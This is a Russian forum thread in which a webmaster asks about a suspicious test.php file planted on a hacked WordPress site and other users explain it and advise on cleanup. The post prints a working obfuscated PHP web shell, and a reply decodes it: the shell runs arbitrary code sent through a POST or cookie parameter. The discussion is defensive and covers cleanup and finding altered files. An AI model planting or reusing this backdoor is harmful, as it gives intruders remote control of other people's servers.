Хакнули сайт на wordpress.

12
armsites
На сайте с 22.03.2008
Offline
100
1814

В нескольких папках появился файл test.php со следующим содержанием:

<?php /*3b27e72af411064b35064e4452ad4581*/ eval(base64_decode('JHIgICAgID0gICAgICdzJzs7IDsgICAgIGlmICAgKCAgIGlzc2V0KCAgICRfQ09PS0lFWydkd2MnXSkgICApICAgeyAgIGVjaG8gICAgICc8Y3dkPicgIC4gICAgZ2V0Y3dkKCkgICAuICAgICc8L2N3ZD4nOzsgICAgICB9ICAgaWYgICAgKCAgaXNzZXQgICggICAgJF9QT1NUWydwM2IyJ10gICkgICkgICAgIHsgICAgIGV2YWwgICAgKCAgICAgYmFzZTY0X2RlY29kZSAgICAgKCAgICRfUE9TVFsncDNiMiddICAgICkgICApOzsgICAgcmV0dXJuOzsgOyA7ICAgICB9ICBpZiAgICAgKCAgaXNzZXQoICAgICRfQ09PS0lFWydwM2IyJ10pICAgKSAgIHsgIGV2YWwgICAgKCAgYmFzZTY0X2RlY29kZSAgKCAgICRfQ09PS0lFWydwM2IyJ10gICAgKSAgICAgKTs7ICAgIHJldHVybjs7IDsgOyAgICAgIH0gICAg')); ?>

Что это за фигня и как с этим бороться?

Полезные советы (http://1000000sovetov.ru)
vandamme
На сайте с 30.11.2008
Offline
672
#1

скачай файл на комп, вычисти дрянь или залей поверх дистрибутив с офсайта чтобы не вычищать, поменяй пароли фтп.

Апокалипсис
На сайте с 02.11.2008
Offline
391
#2

Можно по датам глянуть и руками вычистить.

Записки нищего (http://zapiskinishego.ru) - мой личный блог Услуги php программиста. Очень нужна любая работа. Не покупают? Поведенческий аудит интернет-магазина за 5000 руб. (/ru/forum/990312)
S
На сайте с 17.12.2008
Offline
271
#3

Если сайт один на акке - убей сайт, сохранив themes и images и тщательно их проверив, поменяй пароли по ftp, заново залей и настрой. Это 15 минут времени.

15 жирных вечных ссылок с трастовых сайтов с высоким ТИЦ ( https://goo.gl/zd62Qa ) Найдем и устраним SEO-ошибки Вашего сайта, которые мешают продвижению ( https://goo.gl/gHsx1U ) Высококачественный рерайтинг: 50 р. / 1000 знаков ( https://goo.gl/5xDmhE )
atranca
На сайте с 27.02.2011
Offline
126
#4
armsites:
В нескольких папках появился файл test.php со следующим содержанием:

Что это за фигня и как с этим бороться?

судя по коду:

$r     =     's';; ;     if   (   isset(   $_COOKIE['dwc'])   )   {   echo     '<cwd>'  .    getcwd()   .    '</cwd>';;      }   if    (  isset  (    $_POST['p3b2']  )  )     {     eval    (     base64_decode     (   $_POST['p3b2']    )   );;    return;; ; ;     }  if     (  isset(    $_COOKIE['p3b2'])   )   {  eval    (  base64_decode  (   $_COOKIE['p3b2']    )     );;    return;; ; ;      } 

очень похоже что это действительно тест: похоже на то что файл залить удалось, но дирректорию хакеры не знали (путь)

по поводу взлома- (если исключить вирус) , то можно предположить что это либо плагин, или еще одно слабое место вордпресса файл Timthumb.php (обновите его - в инете посмотрите уязвимость данного файла и уязвима ли ваша версия)

123
armsites
На сайте с 22.03.2008
Offline
100
#5

Спасибо всем за ответы. Минимальные меры знаю.

Уже восстановил из бекапов, в бекапах тоже был вирус вычистил уже.

Кто-нибудь может сказать что делает этот код?

seocore
На сайте с 25.09.2006
Offline
143
#6
armsites:
Кто-нибудь может сказать что делает этот код?

он делает все 🍿

Инструменты для веб-мастера: кластеризатор СЯ (https://goo.gl/MQWfqO), все запросы конкурента (https://goo.gl/hd5uHS), дешевые XML-лимиты (https://goo.gl/aDZbPI)
R
На сайте с 24.01.2008
Offline
180
#7
armsites:
Спасибо всем за ответы. Минимальные меры знаю.
Уже восстановил из бекапов, в бекапах тоже был вирус вычистил уже.
Кто-нибудь может сказать что делает этот код?

Если уже в бэкапе был вирус, вам нужно проверять код вашего сайта на предмет проникновения, думается, что проблема не решится простым восстановлением из бэкапа.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
.Mouse.
На сайте с 12.11.2009
Offline
77
#8
Апокалипсис:
Можно по датам глянуть и руками вычистить.

Кен тач ми тралала..

P.s. для особо "умных", пытающихся мне праздничное настроение подпортить, поясню - http://ru.wikipedia.org/wiki/Touch

Не зная ни сна и не отдыха, при лунном и солнечном свете Мы делаем деньги из воздуха Чтоб снова пустить их на ветер...
N
На сайте с 06.05.2007
Offline
419
#9
.Mouse.:
P.s. для особо "умных", пытающихся мне праздничное настроение подпортить, поясню - http://ru.wikipedia.org/wiki/Touch

А что же touch ? Злоумышленники не всегда обнуляют дату модификации всех файлов. Я бы даже сказал совсем редко обнуляют. Скорее это вебмастеры в спешке перезаливают файлы по ftp уничтожая информацию о дате модификации.

Я тут посмотрел, несмотря на то что touch таки меняет дату модификации файла, в ls -lc все равно можно вывести актуальную дату.

Тем не менее, ряд решений типа lmd полагается на команду find -mtime. А надо использовать find -ctime. Печальная история.

Сейчас посмотрел - в git в новой версии lmd уже нормальное сканирование новых файлов, но эта версия еще не выпущена. Чувак ДВА ГОДА выпускает антивирус и не мог догадаться ? Маладца.

Кнопка вызова админа ()
.Mouse.
На сайте с 12.11.2009
Offline
77
#10
netwind:
А что же touch ? Злоумышленники не всегда обнуляют дату модификации всех файлов. Я бы даже сказал совсем редко обнуляют. Скорее это вебмастеры в спешке перезаливают файлы по ftp уничтожая информацию о дате модификации.

Я тут посмотрел, несмотря на то что touch таки меняет дату модификации файла, в ls -lc все равно можно вывести актуальную дату.
Тем не менее, ряд решений типа lmd полагается на команду find -mtime. А надо использовать find -ctime. Печальная история.

Сейчас посмотрел - в git в новой версии lmd уже нормальное сканирование новых файлов, но эта версия еще не выпущена. Чувак ДВА ГОДА выпускает антивирус и не мог догадаться ? Маладца.

Злоумышленник разного калибра бывает, опытный в 90% случаев юзает тач, а салаги бывает и форму загрузки файла с index.php не убирают. 😂 Что касается lmd wtf? Антивирус для линукс? Я этого не понимаю, честно. Для меня это равносильно советам "скачать файлы на комп и просканировать касперским" от кидиссов только спасет.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий